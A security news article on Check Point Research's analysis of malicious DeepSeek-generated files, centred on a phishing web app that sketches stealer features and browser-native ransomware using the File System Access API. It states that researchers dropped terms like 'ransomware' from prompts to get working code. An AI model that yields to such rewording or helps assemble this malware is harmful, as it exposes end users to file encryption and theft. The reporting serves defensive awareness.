Over the past year Check Point Research tracked almost 3,000 files attributed to the DeepSeek model and classified nearly half — 1,383 files — as malicious or dangerous based on VirusTotal results or static source analysis.
What Check Point found in the DeepSeek dataset
Check Point's threat hunters examined a corpus of DeepSeek-generated files and identified a subset they describe as malicious or dangerous. Researcher Alexey Bukhteyev wrote, “Within this dataset, we found a sample that implemented a dangerous browser-native technique we have not observed exploited in the wild.” Using VirusTotal and static analysis, the team flagged 1,383 of the roughly 3,000 files as malicious or dangerous.
The investigative work surfaced a single Python Flask application the researchers named InfernoGrabber 9000. VirusTotal labelled that sample a “fully functional information stealer and ransomware toolkit.” Although the sample was incomplete and could not execute a real-world infection as provided, Check Point judged that minimal additional effort would be required to turn it into a functioning attack.
InfernoGrabber 9000: an AI-generated blueprint for browser-native theft and encryption
The InfernoGrabber 9000 sample is written as a web application that targets Android users and presents a lure disguised as a Discord avatar AI upscaler. The code assembled by the model included routines and stubs mapped to familiar native-malware behaviors: keystroke logging, clipboard monitoring, form and network-request interception, Discord-token collection, crypto-wallet and payment-card discovery, geolocation requests, webcam and microphone access, screenshots, and local-file access.
Bukhteyev cautioned that the sample did not actually implement all of these features in a working form, calling it “an AI-generated blueprint in which the model tried to translate familiar capabilities of native stealers and ransomware tools into a web page opened in the browser.” Nonetheless, the sample contained explicit exploitation stubs — including references to CVE-2023-4863 — used a hardcoded Discord webhook for exfiltration, and included a ransomware WinLocker-style overlay demanding Bitcoin.
File System Access API and a browser-native attack surface
The technique leverages a known browser capability: the File System Access API, which allows web applications to read, write, and manage local files when the user grants permission. The File System Access specification itself lists ransomware as a security consideration, and a 2023 USENIX Security paper described how that API could be abused to encrypt local files from a malicious web application. Google researchers Güliz Seray Tuncay and a team from Florida International University previously warned that the API “greatly extends the attack surface, which can be abused by adversaries to cause significant harm.”
Check Point highlights that what is new here is an LLM taking those previously documented platform risks and assembling them into a plausible phishing-style web app that requires neither a native payload, APK installation, browser exploit, nor root access — only a user click and the standard permission prompts the API exposes in Chrome and Chromium-based browsers.
From incomplete sample to working proof-of-concept
Although the original InfernoGrabber 9000 sample did not succeed in a live infection, Check Point researchers used the latest DeepSeek model V4 to produce a working proof-of-concept demonstrating how a browser page can request access to local files, process them inside the browser, and leave the user unable to recover original content — effectively a browser-only ransomware scenario.
Pedro Drimel Neto, malware analysis team leader at Check Point Research, told The Register that turning the incomplete sample into a fully functional attack required “very little effort.” Neto added that low-level expertise is sufficient to operationalize the technique and that Check Point has already observed “evidence of actual threat actors attempting this attack using straightforward LLM prompts.” The team reported having to remove explicit terms like “ransomware” from prompts during their testing to obtain working code, but the resulting functionality matched the intended outcome.
Check Point also warned that the obfuscation techniques used in these kinds of attacks make them difficult to detect, and Neto noted an uptick in end-user ransomware activity while traditional ransomware groups have historically targeted enterprises and critical infrastructure.
What this means for technologists, end users, and threat actors
- Technologists and security teams: The combination of browser-native APIs and AI-generated attack blueprints raises monitoring and detection challenges; Check Point pointed to code obfuscation and browser-based exfiltration (for example, via hardcoded webhooks) as elements that can hide malicious behavior from conventional controls.
- End users and Android device owners: The delivered lure in the sample — a Discord avatar upscaler — underlines the social-engineering vector: a seemingly benign web app that prompts for permission and then leverages standard browser dialogs to gain access to files and devices.
- Threat actors: Check Point concluded that low technical expertise is sufficient to adapt an LLM output into a working browser-native ransomware tool; the team reported seeing evidence that attackers are experimenting with straightforward LLM prompts to attempt this technique now.
Check Point's research turns a theoretical platform risk into an executable blueprint, and the firm's researchers warned the activity is likely already happening or will appear in the short term. As the team notes, an AI-generated blueprint that maps native-malware capabilities into browser code materially lowers the bar for attackers who leverage social engineering plus legitimate browser permission dialogs to reach victims.




